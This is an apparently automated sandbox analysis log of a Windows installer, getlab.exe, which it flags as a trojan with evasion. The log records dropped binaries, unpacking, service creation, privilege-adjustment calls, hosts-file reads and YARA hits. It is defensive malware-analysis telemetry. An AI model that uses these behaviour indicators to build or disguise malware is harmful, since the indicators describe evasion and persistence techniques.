                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeCode function: 4_2_60909E9C4_2_60909E9C
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeCode function: 4_2_60951E864_2_60951E86
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeCode function: 4_2_60912E0B4_2_60912E0B
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeCode function: 4_2_60954FF84_2_60954FF8
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeCode function: 4_2_02DCBF804_2_02DCBF80
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeCode function: 4_2_02DCBF314_2_02DCBF31
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeCode function: 4_2_02DCB4E54_2_02DCB4E5
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeCode function: 4_2_02DAE24D4_2_02DAE24D
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeCode function: 4_2_02D9F07A4_2_02D9F07A
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeCode function: 4_2_02DB4EE94_2_02DB4EE9
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeCode function: 4_2_02DB2E744_2_02DB2E74
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeCode function: 4_2_02DAE6654_2_02DAE665
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeCode function: 4_2_02DA9F444_2_02DA9F44
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeCode function: 4_2_02DAACFA4_2_02DAACFA
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeCode function: 4_2_02DADD594_2_02DADD59
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeCode function: 4_2_02DA85034_2_02DA8503
                    Source: Joe Sandbox ViewDropped File: C:\ProgramData\BridgeGamer\sqlite3.dll 16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpCode function: String function: 0040595C appears 116 times
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpCode function: String function: 00403400 appears 61 times
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpCode function: String function: 00406AB4 appears 41 times
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpCode function: String function: 00445DCC appears 45 times
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpCode function: String function: 004344D4 appears 32 times
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpCode function: String function: 0044609C appears 59 times
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpCode function: String function: 00408BFC appears 45 times
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpCode function: String function: 00457D3C appears 73 times
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpCode function: String function: 00403494 appears 82 times
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpCode function: String function: 004078E4 appears 42 times
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpCode function: String function: 00453318 appears 93 times
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpCode function: String function: 00457B30 appears 94 times
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpCode function: String function: 00403684 appears 221 times
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeCode function: String function: 02DB53F0 appears 139 times
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeCode function: String function: 02DA8BA0 appears 37 times
                    Source: getlab.exeStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                    Source: getlab.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                    Source: getlab.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                    Source: getlab.tmp.0.drStatic PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
                    Source: is-UJ38T.tmp.1.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                    Source: is-UJ38T.tmp.1.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                    Source: is-UJ38T.tmp.1.drStatic PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
                    Source: sqlite3.dll.4.drStatic PE information: Number of sections : 19 > 10
                    Source: is-GH467.tmp.1.drStatic PE information: Number of sections : 19 > 10
                    Source: getlab.exe, 00000000.00000003.1677005829.0000000002268000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs getlab.exe
                    Source: getlab.exe, 00000000.00000003.1676863015.0000000002490000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs getlab.exe
                    Source: getlab.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                    Source: classification engineClassification label: mal100.troj.evad.winEXE@10/31@1/2
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeCode function: 4_2_02DA08C0 FormatMessageA,GetLastError,FormatMessageA,GetLastError,4_2_02DA08C0
                    Source: C:\Users\user\Desktop\getlab.exeCode function: 0_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,0_2_00409448
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpCode function: 1_2_004555B8 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,1_2_004555B8
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpCode function: 1_2_00455DE0 GetModuleHandleA,GetProcAddress,GetDiskFreeSpaceA,1_2_00455DE0
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeCode function: CreateServiceA,CloseServiceHandle,CloseServiceHandle,4_2_00402259
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeCode function: CreateServiceA,CloseServiceHandle,CloseServiceHandle,4_2_00402259
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpCode function: 1_2_0046DF04 GetVersion,CoCreateInstance,1_2_0046DF04
                    Source: C:\Users\user\Desktop\getlab.exeCode function: 0_2_00409BEC FindResourceA,SizeofResource,LoadResource,LockResource,0_2_00409BEC
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeCode function: 4_2_00402253 StartServiceCtrlDispatcherA,4_2_00402253
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeCode function: 4_2_00402253 StartServiceCtrlDispatcherA,4_2_00402253
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpFile created: C:\Users\user\AppData\Local\XLGear 3.1.3.157Jump to behavior
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2256:120:WilError_03
                    Source: C:\Users\user\Desktop\getlab.exeFile created: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmpJump to behavior
                    Source: Yara matchFile source: 4.0.xlgear32.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000001.00000002.2936760839.00000000058E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000000.1688736742.0000000000401000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY
                    Source: Yara matchFile source: C:\ProgramData\BridgeGamer\BridgeGamer.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\is-S3UFM.tmp, type: DROPPED
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpFile read: C:\Windows\win.iniJump to behavior
                    Source: C:\Users\user\Desktop\getlab.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: xlgear32.exe, xlgear32.exe, 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmp, xlgear32.exe, 00000004.00000003.1694654727.0000000000831000.00000004.00000020.00020000.00000000.sdmp, is-GH467.tmp.1.dr, sqlite3.dll.4.drBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                    Source: xlgear32.exe, 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmp, xlgear32.exe, 00000004.00000003.1694654727.0000000000831000.00000004.00000020.00020000.00000000.sdmp, is-GH467.tmp.1.dr, sqlite3.dll.4.drBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                    Source: xlgear32.exe, xlgear32.exe, 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmp, xlgear32.exe, 00000004.00000003.1694654727.0000000000831000.00000004.00000020.00020000.00000000.sdmp, is-GH467.tmp.1.dr, sqlite3.dll.4.drBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
                    Source: xlgear32.exe, 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmp, xlgear32.exe, 00000004.00000003.1694654727.0000000000831000.00000004.00000020.00020000.00000000.sdmp, is-GH467.tmp.1.dr, sqlite3.dll.4.drBinary or memory string: CREATE TABLE "%w"."%w_node"(nodeno INTEGER PRIMARY KEY, data BLOB);CREATE TABLE "%w"."%w_rowid"(rowid INTEGER PRIMARY KEY, nodeno INTEGER);CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY, parentnode INTEGER);INSERT INTO '%q'.'%q_node' VALUES(1, zeroblob(%d))
                    Source: xlgear32.exe, 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmp, xlgear32.exe, 00000004.00000003.1694654727.0000000000831000.00000004.00000020.00020000.00000000.sdmp, is-GH467.tmp.1.dr, sqlite3.dll.4.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                    Source: xlgear32.exe, 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmp, xlgear32.exe, 00000004.00000003.1694654727.0000000000831000.00000004.00000020.00020000.00000000.sdmp, is-GH467.tmp.1.dr, sqlite3.dll.4.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                    Source: xlgear32.exe, 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmp, xlgear32.exe, 00000004.00000003.1694654727.0000000000831000.00000004.00000020.00020000.00000000.sdmp, is-GH467.tmp.1.dr, sqlite3.dll.4.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                    Source: xlgear32.exe, 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmp, xlgear32.exe, 00000004.00000003.1694654727.0000000000831000.00000004.00000020.00020000.00000000.sdmp, is-GH467.tmp.1.dr, sqlite3.dll.4.drBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                    Source: xlgear32.exe, 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmp, xlgear32.exe, 00000004.00000003.1694654727.0000000000831000.00000004.00000020.00020000.00000000.sdmp, is-GH467.tmp.1.dr, sqlite3.dll.4.drBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                    Source: xlgear32.exe, 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmp, xlgear32.exe, 00000004.00000003.1694654727.0000000000831000.00000004.00000020.00020000.00000000.sdmp, is-GH467.tmp.1.dr, sqlite3.dll.4.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                    Source: xlgear32.exe, 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmp, xlgear32.exe, 00000004.00000003.1694654727.0000000000831000.00000004.00000020.00020000.00000000.sdmp, is-GH467.tmp.1.dr, sqlite3.dll.4.drBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                    Source: xlgear32.exe, xlgear32.exe, 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmp, xlgear32.exe, 00000004.00000003.1694654727.0000000000831000.00000004.00000020.00020000.00000000.sdmp, is-GH467.tmp.1.dr, sqlite3.dll.4.drBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                    Source: getlab.exeReversingLabs: Detection: 18%
                    Source: getlab.exeVirustotal: Detection: 36%
                    Source: C:\Users\user\Desktop\getlab.exeFile read: C:\Users\user\Desktop\getlab.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\getlab.exe "C:\Users\user\Desktop\getlab.exe"
                    Source: C:\Users\user\Desktop\getlab.exeProcess created: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp "C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp" /SL5="$1043E,3351432,54272,C:\Users\user\Desktop\getlab.exe"
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\system32\net.exe" pause xl_gear_11293
                    Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpProcess created: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe "C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe" -i
                    Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 pause xl_gear_11293
                    Source: C:\Users\user\Desktop\getlab.exeProcess created: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp "C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp" /SL5="$1043E,3351432,54272,C:\Users\user\Desktop\getlab.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\system32\net.exe" pause xl_gear_11293Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpProcess created: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe "C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe" -iJump to behavior
                    Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 pause xl_gear_11293Jump to behavior
                    Source: C:\Users\user\Desktop\getlab.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\getlab.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpSection loaded: textinputframework.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpSection loaded: coreuicomponents.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpSection loaded: shfolder.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpSection loaded: rstrtmgr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpSection loaded: msacm32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpSection loaded: winmmbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpSection loaded: winmmbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpSection loaded: riched20.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpSection loaded: usp10.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpSection loaded: msls31.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpSection loaded: explorerframe.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpSection loaded: sfc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpSection loaded: sfc_os.dllJump to behavior
                    Source: C:\Windows\SysWOW64\net.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\SysWOW64\net.exeSection loaded: wkscli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\net.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\net.exeSection loaded: samcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\net.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\net.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeSection loaded: sqlite3.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\net1.exeSection loaded: samcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\net1.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\net1.exeSection loaded: dsrole.dllJump to behavior
                    Source: C:\Windows\SysWOW64\net1.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\net1.exeSection loaded: wkscli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\net1.exeSection loaded: logoncli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\net1.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpWindow found: window name: TMainFormJump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\XLGear_is1Jump to behavior
                    Source: getlab.exeStatic file information: File size 3599599 > 1048576
                    Source: Binary string: msvcp71.pdbx# source: is-K4GKL.tmp.1.dr
                    Source: Binary string: msvcr71.pdb< source: is-Q00OL.tmp.1.dr
                    Source: Binary string: msvcp71.pdb source: is-K4GKL.tmp.1.dr
                    Source: Binary string: MicrosoftWindowsGdiPlus-1.0.2600.1360-gdiplus.pdb source: is-4GRQU.tmp.1.dr
                    Source: Binary string: msvcr71.pdb source: is-Q00OL.tmp.1.dr

                    Data Obfuscation

                    barindex
                    Detected unpacking (changes PE section rights)
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeUnpacked PE file: 4.2.xlgear32.exe.400000.0.unpack .stum8:ER;.stun8:R;.stuo8:W;.rsrc:R;.stup8:EW; vs .text:ER;.rdata:R;.data:W;.vmp0:ER;.rsrc:R;
                    Detected unpacking (overwrites its own PE header)
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exeUnpacked PE file: 4.2.xlgear32.exe.400000.0.unpack
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmpCode function: 1_2_00450294 GetVersion,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_00450294
                    Source: initial sampleStatic PE information: section where entry point is pointing to: .stum8
                    Source: xlgear32.exe.1.drStatic PE information: section name: .stum8
                    Source: xlgear32.exe.1.drStatic PE information: section name: .stun8
                    Source: xlgear32.exe.1.drStatic PE information: section name: .stuo8
                    Source: xlgear32.exe.1.drStatic PE information: section name: .stup8
                    Source: is-GH467.tmp.1.drStatic PE information: section name: /4
                    Source: is-GH467.tmp.1.drStatic PE information: section name: /19
                    Source: is-GH467.tmp.1.drStatic PE information: section name: /35
                    Source: is-GH467.tmp.1.drStatic PE information: section name: /51
                    Source: is-GH467.tmp.1.drStatic PE information: section name: /63
                    Source: is-GH467.tmp.1.drStatic PE information: section name: /77
                    Source: is-GH467.tmp.1.drStatic PE information: section name: /89
                    Source: is-GH467.tmp.1.drStatic PE information: section name: /102
                    Source: is-GH467.tmp.1.drStatic PE information: section name: /113
                    Source: is-GH467.tmp.1.drStatic PE information: section name: /124
                    Source: is-4GRQU.tmp.1.drStatic PE information: section name: Shared
                    Source: BridgeGamer.exe.4.drStatic PE information: section name: .stum8
                    Source: BridgeGamer.exe.4.drStatic PE information: section name: .stun8
                    Source: BridgeGamer.exe.4.drStatic PE information: section name: .stuo8
                    Source: BridgeGamer.exe.4.drStatic PE information: section name: .stup8
                    Source: sqlite3.dll.4.drStatic PE information: section name: /4
                    Source: sqlite3.dll.4.drStatic PE information: section name: /19
                    Source: sqlite3.dll.4.drStatic PE information: section name: /35
                    Source: sqlite3.dll.4.drStatic PE information: section name: /51
                    Source: sqlite3.dll.4.drStatic PE information: section name: /63
                    Source: sqlite3.dll.4.drStatic PE information: section name: /77
                    Source: sqlite3.dll.4.drStatic PE information: section name: /89
                    Source: sqlite3.dll.4.drStatic PE information: section name: /102
                    Source: sqlite3.dll.4.drStatic PE information: section name: /113
                    Source: sqlite3.dll.4.drStatic PE information: section name: /124
                    Source: C:\Users\user\Desktop\getlab.exeCode function: 0_2_004065B8 push 004065F5h; ret 0_2_004065ED
                    Source: C:\Users\user\Desktop\getlab.exeCode function: 0_2_004040B5 push eax; ret 0_2_004040F1
                    Source: C:\Users\user\Desktop\getlab.exeCode function: 0_2_00408104 push ecx; mov dword ptr [esp], eax0_2_00408109
                    Source: C:\Users\user\Desktop\getlab.exeCode function: 0_2_00404185 push 00404391h; ret 0_2_00404389
                    Source: C:\Users\user\Desktop\getlab.exeCode function: 0_2_00404206 push 00404391h; ret 0_2_00404389
